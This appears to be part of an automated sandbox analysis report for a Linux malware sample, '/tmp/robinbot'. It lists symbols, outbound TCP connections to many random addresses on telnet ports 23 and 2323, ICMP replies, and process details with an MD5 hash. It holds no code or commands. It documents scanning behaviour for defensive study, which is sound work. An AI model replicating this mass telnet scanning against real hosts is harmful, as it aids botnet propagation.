                            xstatconv.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                            y.symtab0x51862c4OBJECT<unknown>DEFAULT10
                            z.symtab0x5186304OBJECT<unknown>DEFAULT10

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Nov 29, 2022 16:33:23.278364897 CET42836443192.168.2.2391.189.91.43
                            Nov 29, 2022 16:33:23.790297985 CET4251680192.168.2.23109.202.202.202
                            Nov 29, 2022 16:33:24.046566010 CET649042323192.168.2.23163.151.162.85
                            Nov 29, 2022 16:33:24.046617031 CET6490423192.168.2.2383.190.241.252
                            Nov 29, 2022 16:33:24.046617031 CET6490423192.168.2.2320.19.233.226
                            Nov 29, 2022 16:33:24.046617031 CET6490423192.168.2.2345.81.142.31
                            Nov 29, 2022 16:33:24.046632051 CET6490423192.168.2.2386.8.87.39
                            Nov 29, 2022 16:33:24.046674967 CET6490423192.168.2.23167.5.212.208
                            Nov 29, 2022 16:33:24.046684980 CET6490423192.168.2.2382.130.119.117
                            Nov 29, 2022 16:33:24.046695948 CET6490423192.168.2.2327.153.74.237
                            Nov 29, 2022 16:33:24.046700954 CET6490423192.168.2.2354.213.36.74
                            Nov 29, 2022 16:33:24.046705008 CET6490423192.168.2.2388.61.106.82
                            Nov 29, 2022 16:33:24.046706915 CET649042323192.168.2.23104.142.173.149
                            Nov 29, 2022 16:33:24.046720028 CET6490423192.168.2.2395.60.53.181
                            Nov 29, 2022 16:33:24.046731949 CET6490423192.168.2.2317.50.61.226
                            Nov 29, 2022 16:33:24.046731949 CET6490423192.168.2.23196.140.221.108
                            Nov 29, 2022 16:33:24.046745062 CET6490423192.168.2.23206.35.61.39
                            Nov 29, 2022 16:33:24.046746969 CET6490423192.168.2.23180.180.89.207
                            Nov 29, 2022 16:33:24.046757936 CET6490423192.168.2.23223.167.249.150
                            Nov 29, 2022 16:33:24.046775103 CET6490423192.168.2.2344.14.123.140
                            Nov 29, 2022 16:33:24.046775103 CET6490423192.168.2.23202.48.66.143
                            Nov 29, 2022 16:33:24.046786070 CET6490423192.168.2.23188.159.123.206
                            Nov 29, 2022 16:33:24.046792030 CET649042323192.168.2.23209.184.177.135
                            Nov 29, 2022 16:33:24.046798944 CET6490423192.168.2.2346.21.99.14
                            Nov 29, 2022 16:33:24.046808958 CET6490423192.168.2.2360.220.164.58
                            Nov 29, 2022 16:33:24.046812057 CET6490423192.168.2.23122.6.32.167
                            Nov 29, 2022 16:33:24.046860933 CET6490423192.168.2.23147.27.52.221
                            Nov 29, 2022 16:33:24.046870947 CET6490423192.168.2.2376.245.236.136
                            Nov 29, 2022 16:33:24.046889067 CET6490423192.168.2.23150.104.214.104
                            Nov 29, 2022 16:33:24.046900988 CET6490423192.168.2.23160.9.111.142
                            Nov 29, 2022 16:33:24.046900988 CET6490423192.168.2.23147.71.201.65
                            Nov 29, 2022 16:33:24.046902895 CET6490423192.168.2.23219.172.207.151
                            Nov 29, 2022 16:33:24.046905994 CET649042323192.168.2.23137.243.81.5
                            Nov 29, 2022 16:33:24.046917915 CET6490423192.168.2.2313.96.107.89
                            Nov 29, 2022 16:33:24.046917915 CET6490423192.168.2.23121.113.44.14
                            Nov 29, 2022 16:33:24.046927929 CET6490423192.168.2.23213.89.225.108
                            Nov 29, 2022 16:33:24.046930075 CET6490423192.168.2.23193.185.85.99
                            Nov 29, 2022 16:33:24.046941042 CET6490423192.168.2.2366.68.113.85
                            Nov 29, 2022 16:33:24.046960115 CET6490423192.168.2.2311.186.151.230
                            Nov 29, 2022 16:33:24.046960115 CET6490423192.168.2.23104.103.254.113
                            Nov 29, 2022 16:33:24.046971083 CET6490423192.168.2.2391.80.118.85
                            Nov 29, 2022 16:33:24.046977043 CET6490423192.168.2.23194.34.99.79
                            Nov 29, 2022 16:33:24.046983957 CET649042323192.168.2.232.206.168.216
                            Nov 29, 2022 16:33:24.046992064 CET6490423192.168.2.23167.10.69.106
                            Nov 29, 2022 16:33:24.047000885 CET6490423192.168.2.2367.26.77.133
                            Nov 29, 2022 16:33:24.047009945 CET6490423192.168.2.2395.62.219.106
                            Nov 29, 2022 16:33:24.047019958 CET6490423192.168.2.2390.208.83.53
                            Nov 29, 2022 16:33:24.047029972 CET6490423192.168.2.2333.201.138.99
                            Nov 29, 2022 16:33:24.047034025 CET6490423192.168.2.23188.218.71.100
                            Nov 29, 2022 16:33:24.047041893 CET6490423192.168.2.2339.27.47.6
                            Nov 29, 2022 16:33:24.047054052 CET6490423192.168.2.23125.194.52.215
                            Nov 29, 2022 16:33:24.047055960 CET6490423192.168.2.2389.138.240.83
                            Nov 29, 2022 16:33:24.047064066 CET649042323192.168.2.2319.135.140.179
                            Nov 29, 2022 16:33:24.047101974 CET6490423192.168.2.23209.151.24.62
                            Nov 29, 2022 16:33:24.047116041 CET649042323192.168.2.23197.239.84.85
                            Nov 29, 2022 16:33:24.047116995 CET6490423192.168.2.23103.183.140.115
                            Nov 29, 2022 16:33:24.047117949 CET6490423192.168.2.2312.53.44.177
                            Nov 29, 2022 16:33:24.047118902 CET6490423192.168.2.23120.206.169.201
                            Nov 29, 2022 16:33:24.047137022 CET6490423192.168.2.2342.209.60.171
                            Nov 29, 2022 16:33:24.047137976 CET6490423192.168.2.23102.65.8.106
                            Nov 29, 2022 16:33:24.047137976 CET6490423192.168.2.23132.74.172.192
                            Nov 29, 2022 16:33:24.047138929 CET6490423192.168.2.2359.166.174.33
                            Nov 29, 2022 16:33:24.047137976 CET6490423192.168.2.2336.250.43.134
                            Nov 29, 2022 16:33:24.047137976 CET6490423192.168.2.23165.244.38.11
                            Nov 29, 2022 16:33:24.047141075 CET6490423192.168.2.232.243.179.168
                            Nov 29, 2022 16:33:24.047137976 CET6490423192.168.2.2383.131.63.191
                            Nov 29, 2022 16:33:24.047141075 CET6490423192.168.2.2316.98.175.232
                            Nov 29, 2022 16:33:24.047141075 CET6490423192.168.2.23151.100.194.4
                            Nov 29, 2022 16:33:24.047154903 CET6490423192.168.2.23160.77.218.188
                            Nov 29, 2022 16:33:24.047154903 CET6490423192.168.2.2381.22.165.36
                            Nov 29, 2022 16:33:24.047154903 CET6490423192.168.2.23176.16.45.44
                            Nov 29, 2022 16:33:24.047157049 CET6490423192.168.2.23156.104.154.166
                            Nov 29, 2022 16:33:24.047158003 CET6490423192.168.2.23223.142.69.204
                            Nov 29, 2022 16:33:24.047157049 CET6490423192.168.2.2353.245.99.125
                            Nov 29, 2022 16:33:24.047158003 CET649042323192.168.2.23200.92.245.153
                            Nov 29, 2022 16:33:24.047158003 CET6490423192.168.2.23209.216.24.196
                            Nov 29, 2022 16:33:24.047167063 CET6490423192.168.2.2382.222.227.185
                            Nov 29, 2022 16:33:24.047169924 CET6490423192.168.2.23190.60.137.214
                            Nov 29, 2022 16:33:24.047169924 CET6490423192.168.2.23119.29.213.41
                            Nov 29, 2022 16:33:24.047171116 CET6490423192.168.2.2316.209.81.69
                            Nov 29, 2022 16:33:24.047169924 CET6490423192.168.2.2345.130.85.127
                            Nov 29, 2022 16:33:24.047172070 CET6490423192.168.2.23154.228.227.62
                            Nov 29, 2022 16:33:24.047172070 CET6490423192.168.2.23117.85.209.244
                            Nov 29, 2022 16:33:24.047172070 CET6490423192.168.2.2314.91.222.3
                            Nov 29, 2022 16:33:24.047175884 CET649042323192.168.2.23116.67.119.148
                            Nov 29, 2022 16:33:24.047184944 CET6490423192.168.2.23199.52.67.26
                            Nov 29, 2022 16:33:24.047184944 CET6490423192.168.2.2348.49.247.168
                            Nov 29, 2022 16:33:24.047188997 CET6490423192.168.2.2378.78.81.123
                            Nov 29, 2022 16:33:24.047188997 CET6490423192.168.2.23208.38.123.178
                            Nov 29, 2022 16:33:24.047188997 CET6490423192.168.2.23223.53.210.84
                            Nov 29, 2022 16:33:24.047194958 CET6490423192.168.2.23155.186.78.227
                            Nov 29, 2022 16:33:24.047205925 CET6490423192.168.2.23108.92.128.157
                            Nov 29, 2022 16:33:24.047213078 CET649042323192.168.2.23141.120.197.91
                            Nov 29, 2022 16:33:24.047213078 CET6490423192.168.2.2370.23.87.24
                            Nov 29, 2022 16:33:24.047224998 CET6490423192.168.2.2361.210.74.156
                            Nov 29, 2022 16:33:24.047234058 CET6490423192.168.2.23135.29.113.127
                            Nov 29, 2022 16:33:24.047238111 CET6490423192.168.2.23149.87.229.133
                            Nov 29, 2022 16:33:24.047244072 CET6490423192.168.2.23104.227.3.213
                            Nov 29, 2022 16:33:24.047247887 CET6490423192.168.2.2365.131.242.78
                            Nov 29, 2022 16:33:24.047257900 CET6490423192.168.2.23124.56.170.194

                            ICMP Packets

                            TimestampSource IPDest IPChecksumCodeType
                            Nov 29, 2022 16:33:24.076025009 CET2.243.179.168192.168.2.2348b7(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:24.077445984 CET84.164.169.219192.168.2.23d3(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:24.165509939 CET104.227.3.213192.168.2.232c8f(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:25.075642109 CET109.250.53.73192.168.2.235c0f(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:25.087412119 CET2.100.218.74192.168.2.239c7b(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:25.090773106 CET100.64.0.1192.168.2.239dfa(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:26.088713884 CET84.138.185.220192.168.2.23f0eb(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:26.216011047 CET184.188.10.149192.168.2.237500(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:26.313884974 CET200.186.38.254192.168.2.23ff08(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:26.437150002 CET100.70.39.241192.168.2.231895(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:26.818012953 CET159.253.60.186192.168.2.2396cf(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:27.912331104 CET216.66.27.22192.168.2.23be6b(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:28.077713966 CET157.90.102.104192.168.2.23c392(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:28.101598024 CET212.58.186.154192.168.2.23ae73(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:29.208991051 CET184.64.190.189192.168.2.2336d5(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:29.304630995 CET172.27.26.2192.168.2.23d913(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:30.083547115 CET185.108.141.43192.168.2.233468(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:30.108963013 CET197.13.3.22192.168.2.23d06b(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:30.240014076 CET184.66.19.102192.168.2.238b7f(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:31.091748953 CET5.231.144.126192.168.2.2368ed(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:31.097918987 CET78.145.38.77192.168.2.2334ab(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:31.193557978 CET161.247.129.30192.168.2.234c29(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:31.277662039 CET69.139.78.181192.168.2.23b23(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:32.091077089 CET178.2.91.212192.168.2.23f17b(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:32.242126942 CET209.193.123.242192.168.2.23b1b9(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:33.093332052 CET212.85.149.2192.168.2.23d5b6(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:33.243920088 CET108.188.174.0192.168.2.23b9c3(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:33.248539925 CET197.215.157.42192.168.2.231a00(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:33.381721020 CET112.188.172.150192.168.2.23e488(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:34.104396105 CET62.145.75.4192.168.2.23f1b3(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:34.153031111 CET10.225.7.93192.168.2.237a0e(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:35.089709044 CET62.91.100.102192.168.2.235c91(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:35.244416952 CET116.212.180.80192.168.2.23e8fd(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:35.480252981 CET10.255.19.2192.168.2.238074(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:36.086944103 CET88.146.180.2192.168.2.23c7b5(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:36.095022917 CET95.117.33.24192.168.2.237ec5(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:36.250732899 CET84.79.234.113192.168.2.23c09b(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:36.353454113 CET59.150.104.134192.168.2.23ea29(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:36.375646114 CET140.119.243.5192.168.2.236040(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:37.248600960 CET24.58.240.182192.168.2.2318cf(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:37.430392981 CET61.94.4.114192.168.2.23d207(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:38.096559048 CET84.131.52.222192.168.2.2375f1(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:38.101320982 CET185.18.150.110192.168.2.23fd31(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:38.208163023 CET168.244.174.85192.168.2.23893b(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:39.195764065 CET68.234.193.158192.168.2.239001(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:40.110686064 CET94.218.103.30192.168.2.23395a(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:40.468406916 CET202.73.96.73192.168.2.23ba27(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:40.475056887 CET41.208.50.178192.168.2.23222(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:41.110058069 CET87.158.91.204192.168.2.234be8(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:42.100858927 CET91.192.12.141192.168.2.232877(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:42.116719961 CET217.93.71.94192.168.2.23de96(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:43.221081018 CET47.185.27.107192.168.2.23af1(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:43.395251036 CET156.241.151.220192.168.2.23f49d(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:45.203403950 CET208.50.108.66192.168.2.23db2e(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:45.225909948 CET70.64.77.247192.168.2.23540e(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:45.310853004 CET98.62.197.158192.168.2.23fb39(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:45.311032057 CET180.110.159.15192.168.2.231355(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:45.374209881 CET1.6.128.62192.168.2.237e0e(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:46.319523096 CET79.201.88.34192.168.2.235767(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:47.320436001 CET185.18.150.110192.168.2.23d7e8(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:48.305032969 CET80.157.129.109192.168.2.23c644(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:48.320652962 CET79.232.104.127192.168.2.2346eb(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:48.323143005 CET91.2.183.20192.168.2.23ed3b(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:48.468430042 CET200.62.9.157192.168.2.23e8b6(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:49.324376106 CET10.253.15.8192.168.2.2364b(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:49.330018044 CET79.202.249.201192.168.2.23b5be(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:49.336210012 CET88.47.79.162192.168.2.2312ce(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:49.398860931 CET66.252.32.209192.168.2.239390(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:49.462851048 CET155.138.215.23192.168.2.23966c(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:50.444892883 CET41.75.87.166192.168.2.231ef5(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:51.320081949 CET91.41.187.63192.168.2.23e8e9(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:51.321906090 CET87.79.223.188192.168.2.23c846(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:52.327235937 CET89.1.198.51192.168.2.23e01d(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:52.338843107 CET217.88.162.239192.168.2.23830a(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:52.361534119 CET151.53.234.146192.168.2.23748e(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:52.562369108 CET88.217.36.119192.168.2.238202(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:52.659887075 CET161.139.245.130192.168.2.23453a(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:52.728688955 CET103.205.95.146192.168.2.23e988(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:53.424141884 CET32.143.227.202192.168.2.238cb3(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:53.528345108 CET93.132.119.212192.168.2.2329fa(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:53.537919998 CET149.11.28.86192.168.2.23bf68(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:53.607084990 CET91.204.25.2192.168.2.23f260(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:53.863291025 CET217.59.116.155192.168.2.23a90(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:54.428241014 CET12.91.57.10192.168.2.23528a(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:54.442852020 CET202.180.8.135192.168.2.23949d(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:54.586560965 CET144.121.64.218192.168.2.23a7d0(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:54.751018047 CET1.208.61.169192.168.2.23b8a3(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:55.305201054 CET149.6.153.178192.168.2.232fc0(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:55.426059008 CET178.190.60.28192.168.2.231078(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:55.565695047 CET81.249.48.177192.168.2.234283(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:55.692862988 CET162.144.240.31192.168.2.231efa(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:56.754209995 CET189.56.161.7192.168.2.23e9a6(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:56.902983904 CET223.67.121.184192.168.2.23a660(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:57.216660023 CET10.240.22.130192.168.2.23c680(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:57.465883970 CET192.98.106.129192.168.2.2361e8(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:57.757288933 CET123.141.250.114192.168.2.23b8c9(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:58.442972898 CET149.224.98.40192.168.2.2374a(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:58.445148945 CET91.59.190.124192.168.2.23e59a(Unknown)Destination Unreachable
                            Nov 29, 2022 16:33:58.522329092 CET62.209.12.66192.168.2.23acd(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:33:58.612983942 CET219.143.239.9192.168.2.2366d5(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:58.632869959 CET61.129.84.81192.168.2.231134(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:33:59.542514086 CET112.196.89.250192.168.2.2323e5(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:01.599872112 CET10.45.233.2192.168.2.23a1fb(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:02.384453058 CET121.119.158.129192.168.2.23de0b(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:02.462060928 CET10.206.0.33192.168.2.231bc6(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:02.544853926 CET130.117.0.1192.168.2.238992(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:02.544974089 CET92.194.212.73192.168.2.23ce46(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:02.545624018 CET80.251.95.248192.168.2.236b56(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:02.698158026 CET69.166.32.1192.168.2.233c0a(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:02.721631050 CET128.233.16.2192.168.2.23d83e(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:03.463397980 CET77.172.167.125192.168.2.23a29(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:03.507352114 CET4.16.139.218192.168.2.235867(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:03.720499039 CET211.12.53.66192.168.2.236abd(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:04.035281897 CET112.189.3.86192.168.2.235989(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:04.870183945 CET36.90.229.53192.168.2.23c96c(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:05.835652113 CET175.209.40.226192.168.2.23a081(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:05.883244038 CET184.105.226.22192.168.2.23ef56(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:06.662172079 CET132.226.203.85192.168.2.231008(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:06.795568943 CET69.194.43.18192.168.2.2346fd(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:06.865114927 CET165.233.221.1192.168.2.23a4c3(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:06.930851936 CET211.175.185.110192.168.2.238ea(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:07.580812931 CET88.97.25.169192.168.2.238d48(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:07.663902044 CET173.233.105.73192.168.2.23d702(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:09.309355974 CET42.157.160.27192.168.2.238a94(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:09.350800037 CET68.234.142.1192.168.2.2392c5(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:09.510848045 CET86.103.51.230192.168.2.237505(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:09.696378946 CET219.146.26.66192.168.2.23dddc(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:09.810518980 CET45.122.229.86192.168.2.232686(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:09.823645115 CET32.143.21.42192.168.2.231c49(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:10.093444109 CET213.200.163.102192.168.2.23c983(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:10.506076097 CET112.188.87.98192.168.2.232ec8(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:10.767899990 CET71.56.55.80192.168.2.232cd2(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:10.777105093 CET100.110.127.213192.168.2.23b2f1(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:10.790404081 CET106.249.179.162192.168.2.239e42(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:11.505203962 CET79.235.42.102192.168.2.238501(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:11.750986099 CET45.200.18.124192.168.2.2314(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:11.782066107 CET154.222.230.22192.168.2.2340c5(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:12.649954081 CET187.190.68.74192.168.2.23583a(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:12.658848047 CET82.83.94.148192.168.2.234e6b(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:12.676213026 CET86.85.151.154192.168.2.23867(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:12.736358881 CET45.77.145.84192.168.2.237e78(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:12.917787075 CET38.140.124.161192.168.2.233e90(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:13.402674913 CET93.83.42.34192.168.2.23474d(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:13.431185007 CET10.103.3.102192.168.2.234128(Net unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:13.651079893 CET49.156.56.10192.168.2.23fb6d(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:13.964160919 CET202.202.218.213192.168.2.236418(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:14.953814983 CET179.13.150.201192.168.2.239ae(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:15.488269091 CET206.174.199.58192.168.2.2335b9(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:15.608143091 CET65.248.164.99192.168.2.238486(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:15.629051924 CET192.168.243.162192.168.2.235b8(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:15.671397924 CET185.165.149.49192.168.2.23e1(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:15.682270050 CET103.112.24.11192.168.2.235f8e(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:16.452430964 CET213.136.2.26192.168.2.23287(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:17.383167982 CET217.23.241.86192.168.2.23855f(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:17.462407112 CET184.10.116.10192.168.2.23cf5(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:17.854123116 CET85.125.29.209192.168.2.23332f(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:18.036909103 CET103.43.42.250192.168.2.2352e1(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:18.408406973 CET79.207.172.143192.168.2.232f4(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:18.413203001 CET84.188.150.9192.168.2.23148d(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:18.418277979 CET87.195.81.199192.168.2.234ccc(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:18.544059992 CET192.168.1.201192.168.2.23dcac(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:18.555510998 CET202.38.180.70192.168.2.23677c(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:18.696636915 CET38.140.168.129192.168.2.23a0d2(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:18.731606960 CET27.124.34.161192.168.2.23fdec(Unknown)Destination Unreachable
                            Nov 29, 2022 16:34:19.520942926 CET10.38.140.152192.168.2.236167(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:19.688936949 CET199.188.91.85192.168.2.236d02(Time to live exceeded in transit)Time Exceeded
                            Nov 29, 2022 16:34:20.581248045 CET68.188.65.229192.168.2.234678(Port unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:21.408014059 CET76.221.132.94192.168.2.23c037(Host unreachable)Destination Unreachable
                            Nov 29, 2022 16:34:21.616302013 CET200.82.189.42192.168.2.2314e6(Host unreachable)Destination Unreachable

                            System Behavior

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:/tmp/robinbot
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:n/a
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:n/a
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:n/a
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:n/a
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47

                            General

                            Start time:16:33:23
                            Start date:29/11/2022
                            Path:/tmp/robinbot
                            Arguments:n/a
                            File size:133298 bytes
                            MD5 hash:500009d8f68330a8f82b59884a9afe47